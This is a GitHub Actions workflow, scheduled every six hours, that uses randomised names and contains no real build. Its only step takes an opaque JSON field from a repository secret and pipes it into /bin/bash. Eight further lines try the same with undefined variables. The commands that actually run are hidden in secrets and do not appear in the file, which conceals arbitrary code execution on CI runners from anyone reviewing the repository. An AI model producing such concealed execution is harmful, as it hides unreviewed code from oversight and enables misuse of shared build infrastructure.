name: mnajx

on:
  workflow_dispatch:
  schedule:
    - cron: '48 1/6 * * *'
jobs:  # 7341
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: mnajx
        env:
          ciy2: ${{ secrets.ciy2 }}
        run: |
          echo $ciy2 | jq -r .wlfx3 | /bin/bash
          echo $id67 | jq -r .wu4878 | /bin/bash
          echo $ig03 | jq -r .jjcco2 | /bin/bash
          echo $gqwik82825 | jq -r .p67553 | /bin/bash
          echo $t910 | jq -r .onnm8992 | /bin/bash
          echo $u1 | jq -r .jtdg347 | /bin/bash
          echo $eb84 | jq -r .u8824 | /bin/bash
          echo $sdqop7 | jq -r .vqrcs62 | /bin/bash
          echo $w5212 | jq -r .bbjn485 | /bin/bash

